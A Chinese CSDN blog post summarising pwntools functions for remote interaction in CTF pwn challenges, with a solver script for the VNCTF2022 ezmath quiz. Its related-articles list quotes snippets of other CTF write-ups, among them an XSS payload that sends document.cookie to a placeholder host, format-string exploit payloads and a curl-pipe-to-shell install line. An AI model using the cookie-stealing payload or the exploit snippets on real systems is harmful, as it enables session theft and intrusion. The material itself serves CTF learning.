[Tools]Pwn中用于远程交互的库函数总结

最新推荐文章于 2022-10-29 23:46:15 发布
最新推荐文章于 2022-10-29 23:46:15 发布
阅读量2.3k 收藏 9
点赞数 2
分类专栏: # Web安全 # 脚本 文章标签: pwntools Shell python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DARKNOTES/article/details/124282024
版权

Pwn中用于远程交互的库函数总结

在比赛当中经常会与端口应用交互的场景,

首先是PWN库的安装和使用,

参考资料:pwntools — pwntools 4.9.0dev documentation

安装

pip install --upgrade pwntools

导入

from pwn import *

简单IO函数

进程创建
p = process('/bin/sh')
# 还可以在已经建立的连接,如IP连接和SSH连接上创建进程
# 关闭进程
p.close()
远程连接主机端口
host = remote('ip', port, typ='协议\协议簇') # 可参考的协议或协议簇,udp、ipv4等
远程侦听
client = listen(port).wait_for_connection()
创建交互Shell
host.interactive()
# 当然,你也可以与本地的shell连接
sh = process('/bin/sh')
sh.interactive()
接收操作
#  接收n字节数据,一定时间后超时
bytes = host.recv(n, timeout = default)
# 换行结束接收,keepends=False不保留结尾的\n
bytes = host.recvline(keepends=True)
# 接收直至分隔符delim
bytes = host.recvuntil(delim,drop=Fasle)
# 接收模式匹配的字符串
bytes = host.recvregex(pattern)
# 接收直到超时或EOF
bytes = host.recvrepeat(timeout)
# 接收数据直到EOF
bytes = host.recvall() 
# 清空缓冲区未接收的数据
host.clean()
发送操作
# 发送一段数据
host.send(bytes)
# 发送数据加一个换行
host.sendline(bytes)
SSH连接
# 创建连接
shell = ssh(host='ip', user='root', port=port, password=password)
# 可以在该SSH连接开启进程
s = ssh(host='example.pwnme')
sh = s.process('/bin/sh', env={'PS1':''})
sh.sendline(b'echo Hello; exit')
sh.recvall() # 或者sh.recvline()
输出:b'Hello\n'

脚本示例

针对的是VNCTF2022ezmath

按照逻辑完成Crypto问答题目任务的脚本(无sao操作


from pwn import *
from hashlib import sha256


'''
功能:爆破计算MD5前4位
'''
def figure_puzzle1(puzzle1_l, puzzle1_r):
    '''省略'''
    return XXXX

# 连接远程主机,从目标主机接收一次数据
target = remote('ip', port)
puzzle1 = str(target.recvline())

# 截取问题关键信息,按照对方提供的信息处理,时间充足可以用正则提取
puzzle1_l = puzzle1[18:34]
puzzle1_r = puzzle1[39:103]

# 计算MD5的缺失位
output_of_puzzle1 = figure_puzzle1(puzzle1_l, puzzle1_r)
print(puzzle1_l, puzzle1_r, output_of_puzzle1)

# 向目标主机发送一段信息,但要注意的是,要对bytes类型进行编码(一般默认就是utf8
target.send(bytes(output_of_puzzle1, 'utf-8'))
count = 780

# 循环完成与对方主机的777次连接,完成对方脚本逻辑中的任务,最终获取返回的Flag
while (count):
    count -= 1
    # 输出轮次,作为对人的提醒
    print("----------------"+str(count)+"------------------")
    # 获取第二阶段的谜题,第X个n,使得(2^n-1) % 15 == 0,答案即为它本身*4
    puzzle2plus = str(target.recvline())
    print(puzzle2plus)
    # 初次连接的特殊处理
    if count == 779:
        output_of_puzzle2plus = int(puzzle2plus[40:50]) * 4
    else:
        # 正常处理
        output_of_puzzle2plus = int(puzzle2plus[18:28]) * 4
    target.send(bytes(str(output_of_puzzle2plus), 'utf-8'))
    print(target.recvline())
    # 提高容错率,多获取几次
    if count <= 3:
        print(target.recvline())
        print(target.recvline())
        print(target.recvline())
        print(target.recvline())
車鈊
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PwnWAF:用于AWD的pwn日志工具
05-16
PWA文件 用于AWD的pwn日志工具 描述 使用traceGen.py生成elf文件。 elf_name:我们要记录哪个elf文件 log_path:日志文件 计算机:此精灵的平台,(仅支持x86 / x86_64) 注意:elf_name和log_path必须是绝对路径 用法: python traceGen.py machine elf_name log_path 例如: python traceGen.py 64 /path/to/elf/test.bin /path/to/log/log.txt elf_name.out是日志文件,然后重命名该文件(或其他文件)以使xinetd引导该文件。 此文件将启动一个子进程以执行elf_name文件,并且父进程将记录信息: +-----+ |child| --> execute /path/to/elf/test.bin
seccomp-tools:提供用于seccomp分析的强大工具
04-06
Seccomp工具 提供用于seccomp分析的强大工具。 该项目旨在(但不限于)分析CTF pwn挑战的seccomp沙箱。 某些功能可能是CTF特有的,但对于在实际情况下分析seccomp仍然有用。 特征 转储-自动从执行文件转储seccomp-bpf。 Disasm-将bpf转换为人类可读的格式。 简单的反编译。 尽可能显示系统调用名称和参数。 丰富多彩的! Asm-编写seccomp规则是如此简单! mu-模拟seccomp规则。 支持多架构。 安装 在RubyGems.org上可用! $ gem install seccomp-tools 如果编译时失败,请尝试: sudo apt install gcc ruby-dev 并再次安装seccomp-tools。 命令行界面 seccomp工具 $ seccomp-tools --help # Usage:
(攻防世界)(pwn)4-ReeHY-main
PLpa的博客
10-24 378
这题很早之前就做过了,之前做的时候没怎么注意,这次重新写又有很多感受。 0x00前言 这题有两种做法,一种是堆溢出,一种是栈溢出。第一次写的时候,由于刚刚入门,只会用栈溢出,这次重新看,用堆溢出试了一下,由于技术有限,还是出现了很多错误,找了很多资料,磕磕绊绊一下午才利用成功。 故写此博客记录一下。 0x01栈溢出利用方法 此题的栈溢出漏洞比较明显,因为他有一个很明显的整数溢出漏洞,可以导致栈漏洞...
python练习—pwn格式化字符串
v_3483608762的博客
07-25 569
[第五空间2019 决赛]PWN5 好长时间没有写博客了,记录一下。 1, printf(&buf)为明显的格式化字符串漏洞 格式化字符串漏洞 可以利用他覆盖掉un_804c044,从而可以执行后门程序。 2第一种方法 使用fmtster——payload函数,简单了当的覆盖掉目标地址。 详情 :fmtster函数 from pwn import * p=process('pwn') # p=remote('node4.buuoj.cn',29440) unk_char=0x0804C044 pa
pwn学习(二)
qq_37439229的博客
10-02 753
今天主要刷了点题,学到个格式化字符串泄漏cancary fm from pwn import * #p = process('./main') p = remote('node3.buuoj.cn',28633) payload = '%4c%13$n' + p32(0x804a02c) p.send(payload) #print(p.recv()) p.interactive() 格式化字符串覆盖小数字 jarvisoj_tell_me_something from pwn import * p =
pwn记录的第一天
qq_61138289的博客
10-29 562
PWN 的第一次记录
python3-pwntools教程_pwntools的学习笔记(一)
weixin_29518761的博客
01-14 563
pwntools的安装在Linux下安装敲击简单的(>ωsudo pip install pwntools即可。pwntools的简单使用1.导入包使用from pwn import *命令即可导入包,一般做PWN题时2.链接远程服务器或链接本地文件需要与远程计算机进行连接此时可以使用命令r = remote('目标IP或目标URL', 目标端口号)也可以在本地进行测试,使用r = proc...
pwn刷题num18------直接连接远程即能获得shell
tbsqigongzi的博客
04-24 537
BUUCTF–PWN–test_your_nc 首先查保护->看链接类型->增加可执行权限->运行 64位,小端序 开启部分RELRO---got表仍可写 未开启canary保护---栈溢出 开启NX保护----堆栈不可执行 开启PIE----程序地址不是真实地址 动态链接 程序执行后出现一个$符号,随便输入后又出现了/bin/sh ida看一下 主函数直接就是调用了system(“/bin/sh”),直接获得shell 或者写个exp exp from pwn import
pwn的五道基础题
lllwky的博客
03-27 6263
文章目录一:ret2text1:服务器地址与端口号2:传入参数3:参数的接收范围4:找到bin/sh所在的地址二:your_nc三:overflow四:printf1:找到如何进入/bin/sh2:找到sth的地址3:获得格式化字符串的偏移量五:rop拓展: 一:ret2text from pwn import * context.arch="amd64" io=remote("101.34.90.86",10002) secure_addr=0x400852 payload=b"a"*0x10+b"a"*
CTF-PWN环境搭建
半岛铁盒的博客
02-24 1368
1.虚拟环境:Ubuntu 18.04 2.必备一般软件 vim:个人必备,强烈建议学习一点vim的相关知识,可以提高效率,避免安装过多的编辑器或者IDE git:必备,很多高效的插件都是放在GitHub上的 python:必备,建议python3,毕竟python2已经不支持了 pip:必备,有一些插件需要使用pip进行安装 一款编辑器:这个看个人需求,vscode、sublime text等,个人喜欢就好。如果有条件的话,可以设置一下配置,当作一个简单的开发IDE使用,毕竟Pwn环境开发的代码不会很多
pwn题目的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
pwn练习附件四道题含exp
11-21
个人pwn练习题目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
信息安全_CTFPWN题目实例分析.pptx
08-14
CTFPWN题目实例分析
[WEB/nodejs]Nodejs知识入门和子进程
車鈊的博客
04-06 4375
文章目录入门内容Nodejs初步解构赋值事件绑定1.DOM绑定2.在JS绑定3. 绑定事件监听函数Callback回调函数子进程模块_函数child_process()参考链接 入门内容 Nodejs初步 Nodejs是在服务器端运行的JS代码,跨平台JS的运行环境, 采用V8引擎运行源代码, 利用事件驱动、非阻塞、异步I/O模型等来提高运行的性能。 使用多进程是扩展一个 Node 应用最好的方式, 被设计用来通过很多节点创建分布式应用, 这也是为什么被命名为 Node。 解构赋值 类似于解包,将对象或者数
[环境搭建/Docker-Compose]vulhub漏洞靶场环境搭建/Docker容器关闭方法
車鈊的博客
06-19 2254
安装docker 在root权限下执行此命令 curl -s https://get.docker.com/ | sh //安装新版本的docker sudo apt purge --autoremove docker.io //卸载老版本的docker sudo apt install docker.io //使用Ubuntu自带的docker包管理器安装,但是一般版本比较老 docker服务可能需要手动启动:service start docker 安装docker-compose
[Web/IP]真实IP获取原理/客户端IP伪造测试
車鈊的博客
07-27 1740
真实IP获取和客户端IP伪造 近期比赛又做到了用户IP伪造的题目,想来不如就总结一下。 为什么要确认IP? 在Web应用下,部分逻辑需要确认用户的客户端IP。如对大量频繁发送危险请求的IP进行封禁。 进行用户IP确认的方法有很多,但是部分方法降低了IP获取的难度,确牺牲了安全性,产生了IP可伪造的风险。 服务器是如何确定IP的? REMOTE_ADDR 标识发出请求的主机IP地址,代表客户端IP。这个标识完全由服务器决定,除了路由之外无法伪造,通过TCP协议根据直接请求来源的远程主机确定,服务端根据请求TC
[WP/CTFshow]XSS Web316-333
車鈊的博客
07-11 1691
CTFSHOW WP 题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS 316.需要配套接收端XSS脚本 如果未过滤script且对外部资源加载无限制的情况下,可以指定src为精心准备的JS文件,使其加载,产生携带COOKIE的请求。 本解法直接将产生请求写在了表层。 <script>document.location.href='http://xxxxxxxxxxxxxxxxxxxx/x.php?1='+document.cookie</script> 3
[Web/Nodejs]原型链污染EJS模块的利用分析(附源码分析)
車鈊的博客
04-06 1674
EJS _CVE-2019-10744(outputFunctionName) 在EJS引擎当,存在一个属性opts.outputFunctionName (注:影响该位置的源数据流实际上有很多个,这个属性利用条件相对宽松,只要有就能用) 读源码 ejs作为渲染引擎,包含一些代码执行的功能,帮助将执行结果回显到页面。 【以下代码为exports.render-----调用----->handleCache】 首先调用了render的话(在我们做题时可以看到的表层函数) render调用的handl
angr在pwn的应用
最新发布
03-31
angr在pwn的应用主要是用于自动化漏洞利用的符号执行和约束求解。 符号执行是指将程序的变量替换成符号,然后通过路径探索来执行程序,从而得到程序的执行路径和可能的程序状态。在pwn,符号执行可以用于自动化漏洞利用的ROP链构造和shellcode生成。 约束求解是指根据程序的执行路径和状态,推导出变量的取值范围,从而得到变量的具体取值。在pwn,约束求解可以用于自动化漏洞利用的输入构造和输入长度计算。 除了符号执行和约束求解,angr还提供了一些其他的功能,比如基于模拟器的代码执行和基于符号的污点分析。这些功能在pwn也有着广泛的应用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值